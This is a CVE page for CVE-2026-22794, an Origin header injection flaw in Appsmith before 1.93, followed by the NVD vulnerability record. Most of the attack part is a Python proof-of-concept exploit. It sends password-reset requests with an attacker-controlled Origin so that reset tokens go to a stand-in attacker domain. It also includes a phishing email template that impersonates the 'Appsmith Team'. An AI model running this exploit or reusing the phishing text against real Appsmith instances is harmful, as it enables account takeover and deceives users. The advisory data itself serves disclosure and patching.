CVE-2026-22794

# CVE-2026-22794 PoC - Origin Header Injection in Appsmith # This PoC demonstrates the Origin header injection vulnerability # that leads to account takeover via password reset token theft import requests import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart TARGET_URL = "https://vulnerable-appsmith-instance.com" ATTACKER_DOMAIN = "attacker-controlled-domain.com" ATTACKER_SERVER = f"https://{ATTACKER_DOMAIN}" def exploit_origin_injection(): """ Simulate the Origin header injection attack """ print("[*] Starting CVE-2026-22794 Exploitation") # Step 1: Request password reset with malicious Origin header reset_endpoint = f"{TARGET_URL}/api/v1/users/forgot-password" headers = { "Origin": ATTACKER_SERVER, # Malicious Origin "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } payload = { "email": "[email protected]" } print(f"[*] Sending password reset request with Origin: {ATTACKER_SERVER}") response = requests.post(reset_endpoint, json=payload, headers=headers) # Step 2: The server uses the attacker-controlled Origin to generate email links # Email will contain: https://attacker-controlled-domain.com/user/reset-password?token=XXX print(f"[*] Response Status: {response.status_code}") print(f"[*] Email sent to victim with malicious link") print(f"[*] Malicious URL: {ATTACKER_SERVER}/user/reset-password?token=<STOLEN_TOKEN>") # Step 3: Set up listener to capture the token print(f"[*] Attacker should set up listener on {ATTACKER_SERVER}") print(f"[*] When victim clicks the link, token will be exfiltrated") return True def generate_phishing_email(): """ Generate a phishing email template that the attacker would send """ email_template = f""" Subject: Password Reset Request Dear User, We received a request to reset your Appsmith account password. Click the link below to reset your password: {ATTACKER_SERVER}/user/reset-password?token={{token}} If you did not request this, please ignore this email. Best regards, Appsmith Team """ return email_template if __name__ == "__main__": exploit_origin_injection()

{"cve": {"id": "CVE-2026-22794", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:08.633", "lastModified": "2026-01-21T19:14:17.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93."}, {"lang": "es", "value": "Appsmith es una plataforma para construir paneles de administración, herramientas internas y cuadros de mando. Antes de la versión 1.93, el servidor utiliza el valor Origin de los encabezados de solicitud como la baseUrl de los enlaces de correo electrónico sin validación. Si un atacante controla el Origin, se pueden generar enlaces de restablecimiento de contraseña / verificación de correo electrónico en los correos electrónicos que apunten al dominio del atacante, causando que los tokens de autenticación queden expuestos y potencialmente llevando a la toma de control de la cuenta. Esta vulnerabilidad se corrige en la versión 1.93."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.93", "matchCriteriaId": "5D0E0C12-CE13-4165-8647-F27EE6E03D0F"}]}]}], "references": [{"url": "https://github.com/appsmithorg/appsmith/commit/6f9ee6226bac13fb4b836940b557913fff78b633", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}